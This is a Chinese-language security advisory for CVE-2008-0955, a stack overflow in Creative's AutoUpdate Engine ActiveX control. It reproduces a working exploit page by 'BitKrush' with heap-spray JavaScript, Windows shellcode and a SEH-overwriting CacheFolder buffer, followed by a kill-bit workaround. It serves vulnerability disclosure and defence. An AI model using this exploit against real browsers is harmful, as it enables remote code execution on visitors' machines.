安全研究
安全漏洞
Creative软件自动升级引擎ActiveX控件栈溢出漏洞
发布日期:2008-05-28
更新日期:2008-05-29
受影响系统:
Creative Labs AutoUpdate Engine ActiveX描述:
BUGTRAQ ID: 29391
CVE(CAN) ID: CVE-2008-0955
Creative是生产用于个人电脑和网络方面的数字娱乐产品的厂商。
Creative在很多产品中都提供了软件自动升级引擎ActiveX控件(CTSUEng.ocx),这个控件没有正确地处理CacheFolder属性,如果用户受骗访问了恶意网页并向该属性传送了超长参数的话,就可能触发栈溢出,导致执行任意指令。
<*来源:Greg Linares (glinares.code@gmail.com)
链接:http://secunia.com/advisories/30403/
http://www.kb.cert.org/vuls/id/501843
http://research.eeye.com/html/alerts/zeroday/20080526.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Affected:
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:
Sound cards
Audigy
Audigy 2
Audigy 2 LS
Audigy 2 NX
Audigy 2 Platinum
Audigy 2 Platinum eX
Audigy 2 Value
Audigy 2 ZS
Audigy 2 ZS Gamer
Audigy 2 ZS Notebook
Audigy 2 ZS Platinum
Audigy 2 ZS Platinum Pro
Audigy 2 ZS Video Editor
Audigy 4 Pro
Audigy Gamer
Audigy LS
Audigy MP3+
Audigy Platinum
Audigy Platinum eX
Live! 24-bit
Live! 24-bit External
Live! 5.1
Live! 5.1 Digital (Dell)
Live! ADVANCED MB
MP3 +
Sound Blaster Audigy 2 ZS Digital Audio
Sound Blaster Audigy ADVANCED MB
Sound Blaster X-Fi Fatal1ty
Wireless Music
X-Fi Elite Pro
X-Fi Platinum
X-Fi XtremeMusic
USB Sound Blaster
Audigy 2 NX
MP3 +
Portable Audio
MuVo
MuVo NX
MuVo Slim
MuVo TX
MuVo TX FM
MuVo² X-Trainer
MuVo²
MuVo² FM
NOMAD II 32MB
NOMAD II MG
NOMAD IIc
NOMAD Jukebox 3
NOMAD Jukebox ZEN
Rhomba
Portable Media Players
ZEN Portable Media Center
ZEN Vision 30GB
MP3 Players
MuVo
MuVo 2.0 / MuVo Mix
MuVo Micro
MuVo NX
MuVo Slim
MuVo Sport C100
MuVo TX
MuVo TX FM
MuVo V200
MuVo² X-Trainer
MuVo²
MuVo² FM
NOMAD II 32MB
NOMAD II MG
NOMAD II MG Limited Edition
NOMAD IIc
NOMAD JukeBox
NOMAD Jukebox 10GB
NOMAD Jukebox 2
NOMAD Jukebox 3
NOMAD Jukebox C
NOMAD Jukebox ZEN
NOMAD Jukebox ZEN NX
NOMAD Jukebox ZEN USB 2.0
Rhomba
ZEN 20GB
ZEN Micro
ZEN Nano 512MB
ZEN Nano Plus
ZEN Neeon 5GB/6GB
ZEN Portable Media Center
ZEN Sleek
ZEN Touch
ZEN Vision 30GB
ZEN Xtra
Web Cameras
Creative PC-CAM 900
Creative WebCam Vista
Game Star
Live! Ultra for Notebooks
PC-CAM 880
WebCam Instant
WebCam Instant
WebCam Live!
WebCam Live! Pro
WebCam Live! Ultra
WebCam Notebook
WebCam NX
WebCam NX Pro
WebCam NX Ultra
WebCam Vista
Video
Audigy 2 ZS Video Editor
Wireless
Wireless Music
Notebook Products
Audigy 2 NX
Audigy 2 ZS Notebook
Live! 24-bit External
Live! Ultra for Notebooks
MP3 +
WebCam Notebook
Software
Game Star
http://us.creative.com/support/downloads/popup_supportproducts.asp
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
KILL BIT THIS ^^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-->
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>
建议:
临时解决方法:
* 在IE中禁用Creative软件自动升级ActiveX控件,为以下CLSID设置kill bit:
{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}]
"Compatibility Flags"=dword:00000400
厂商补丁:
Creative Labs
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.creative.com/
浏览次数:5090
严重程度:0(网友投票)
绿盟科技给您安全的保障